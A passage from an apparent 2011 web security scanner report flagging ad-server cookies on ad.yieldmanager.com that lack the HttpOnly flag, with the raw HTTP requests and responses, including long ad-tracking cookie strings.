P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Thu, 12 May 2011 13:33:21 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Set-Cookie: ts=1305207201; domain=.mathtag.com; path=/; expires=Fri, 11-May-2012 13:33:21 GMT
Content-Length: 43
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: Keep-Alive

GIF89a.............!.......,...........D..;
9.16. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp?Z=300x250&anmember=541&anprice=300&s=1588565&_salt=2649311919&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://adserving2.cpxinteractive.com/st?ad_type=iframe&ad_size=300x250&section=1588565
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; ih="b!!!!R!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1CPe!!!!#=!=eG!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; vuday1=!!!!#N==#3P+HYn; pv1="b!!!!<!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~!#vtn~!$m%+!1CPe!%]D<!!!!$!?5%!$U*40!ZZ<)!!jYm!'iBj~~~~~~=!=eG~M.jTN"; bh="b!!!%,!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!-=!=eG!!0O<!!!!7=!=eG!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!3=!=eG!!J<E!!!!3=!=eG!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!4=!=eG!!q:E!!!!1=!=eG!!q<+!!!!2=!=eG!!q</!!!!2=!=eG!!q<3!!!!2=!=eG!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#=!=eG!!tjQ!!!!,<yq][!!ucq!!!!7=!=eG!!vRm!!!!-=!=eG!!vRq!!!!-=!=eG!!vRr!!!!-=!=eG!!vRw!!!!7=!=eG!!vRx!!!!-=!=eG!!vRy!!!!-=!=eG!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!-=!=eG!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!-=!=eH!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!-=!=eG!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!-=!=eG!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!-=!=eG!#MTF!!!!-=!=eG!#MTH!!!!-=!=eG!#MTI!!!!-=!=eG!#MTJ!!!!-=!=eG!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!3=!=eG!#SF3!!!!3=!=eG!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!-=!=eG!#UDP!!!!3=!=eG!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!-=!=eG!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!-=!=eG!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!-=!=eG!#tM)!!!!-=!=eG!#tn2!!!!-=!=eG!#uE=!!!!#<x9#K!#uJY!!!!3=!=eG!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!-=!=eG!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!0=!=eG!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!-=!=eG!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!-=!=eG!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!0=!=eG!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0160.rm.bf1
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 13:32:52 GMT
Pragma: no-cache
Content-Length: 938
Content-Type: application/x-javascript
Age: 1
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"250\" width=\"300\" src=\"http://adserving.cpxinteractive.com/iframe
...[SNIP]...
9.17. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=23705&data=238001&id=717024&data=238001&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!<!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~!#vtn~!$m%+!1CPe!%]D<!!!!$!?5%!$U*40!ZZ<)!!jYm!'iBj~~~~~~=!=eG~M.jTN"; bh="b!!!%,!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!-=!=eG!!0O<!!!!7=!=eG!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!3=!=eG!!J<E!!!!3=!=eG!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!4=!=eG!!q:E!!!!1=!=eG!!q<+!!!!2=!=eG!!q</!!!!2=!=eG!!q<3!!!!2=!=eG!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#=!=eG!!tjQ!!!!,<yq][!!ucq!!!!7=!=eG!!vRm!!!!-=!=eG!!vRq!!!!-=!=eG!!vRr!!!!-=!=eG!!vRw!!!!7=!=eG!!vRx!!!!-=!=eG!!vRy!!!!-=!=eG!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!-=!=eG!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!-=!=eH!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!-=!=eG!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!-=!=eG!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!-=!=eG!#MTF!!!!-=!=eG!#MTH!!!!-=!=eG!#MTI!!!!-=!=eG!#MTJ!!!!-=!=eG!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!3=!=eG!#SF3!!!!3=!=eG!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!-=!=eG!#UDP!!!!3=!=eG!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!-=!=eG!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!-=!=eG!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!-=!=eG!#tM)!!!!-=!=eG!#tn2!!!!-=!=eG!#uE=!!!!#<x9#K!#uJY!!!!3=!=eG!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!-=!=eG!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!0=!=eG!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!-=!=eG!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!-=!=eG!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!0=!=eG!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp1v4-_5>3Qm_Z5lxm/ZqKA/a92; ih="b!!!!S!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*aNT!!!!#=!>NG!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!'=!>N?!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1CPe!!!!#=!=eG!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; vuday1=!!!!#alc8TNpqDMN==#3/9Lqe; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
